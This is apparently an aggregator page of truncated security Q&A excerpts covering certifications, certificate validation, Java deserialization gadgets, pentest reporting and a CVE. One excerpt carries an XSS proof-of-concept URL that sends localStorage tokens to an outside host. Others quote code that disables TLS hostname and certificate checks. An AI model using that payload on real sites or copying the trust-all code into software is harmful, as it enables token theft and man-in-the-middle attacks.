Collaborate Disseminate
My ISP is able to contact someone I just connected with on Telegram. I don’t know how. I have started using VPN, but even without VPN is that even possible or is there any other method that the ISP is using? Can the ISP contact him with j… Continue reading Can ISP contact someone I connected with on Telegram? [closed]
I am looking for a good certification in security, but there are a lot of certificates.
The security vendors I’ve seen so far are OffSec, GIAC/SANS, ISC2, Comptia, and EC-Council. Each vendor has a variety of certifications.
I want the ce… Continue reading What are the best professional certificates for a software security [closed]
I have a java deserialization vulnerability, with a poc. The poc exploits using the groovy library, and the groovy version is 2.4.19.
When searching online for a CVE related to this gadget I couldn’t find.
Is it that groovy does not agree … Continue reading Which groovy is safe from gadget chains?
What types of certificates are there?
I was checking online and I found several different types, some at the level of the format of the certificate (x509, PEM, DER), and one at the application level (TLS/SSL, SSH, PGP).
Can someone please … Continue reading Types of certificate? [duplicate]
I have a reported finding saying that hostname verification is disabled.
This can be deduced from this line of code:
final HttpClientBuilder httpClientBuilder = HttpClientBuilder.create();
httpClientBuilder.setSSLContext(sslContext).se… Continue reading How to verify hostname of certificate? and Is it mandatory if client knows the certificate?
I have this line of code in a client server project:
sslContext.init(null, new TrustManager[]{new TrustAnyManager()}, null);
A security guy pointed out that this is skipping the validation of the certificate, but I don’t understand the se… Continue reading What is the security impact of disabling certificate check [duplicate]
I am trying to understand the vulnerability in Rebuild in chromium which is identified as CVE-2023-1613.
I found this poc online: https://github.com/getrebuild/rebuild/issues/596
What I understood so far, that the vulnerability can let you… Continue reading how to exploit CVE-2023-1613
I am running a pentest on a web application, and I detected a vulnerability but I am not sure how to report it. I am confused if I should split it or document it as 1 finding. I will explain below.
So the finding is, a JWT token with large… Continue reading How to report related findings in a pentest report
I am running a pentest on a web application, and I detected a vulnerability but I am not sure how to report it. I am confused if I should split it or document it as 1 finding. I will explain below.
So the finding is, a JWT token with large… Continue reading How to report related findings in a pentest report
I am trying to poc and XSS in the url, and I have it working fine with the below url:
https://example.com:15000/test/%3Cscript%20type=%22text/javascript%22%3Edocument.location=%22http://192.168.1.88:8080/%3fc=%22+localStorage.getItem(%22to… Continue reading + is decoded by the browser as space [closed]